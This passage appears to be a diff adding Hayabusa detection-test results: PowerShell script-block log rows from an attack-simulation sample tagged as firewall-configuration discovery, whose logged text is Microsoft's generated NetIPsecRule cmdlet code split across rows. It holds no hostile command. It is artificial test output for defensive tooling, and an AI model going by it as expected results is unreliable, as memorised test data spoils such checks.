-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,", ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAsso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) 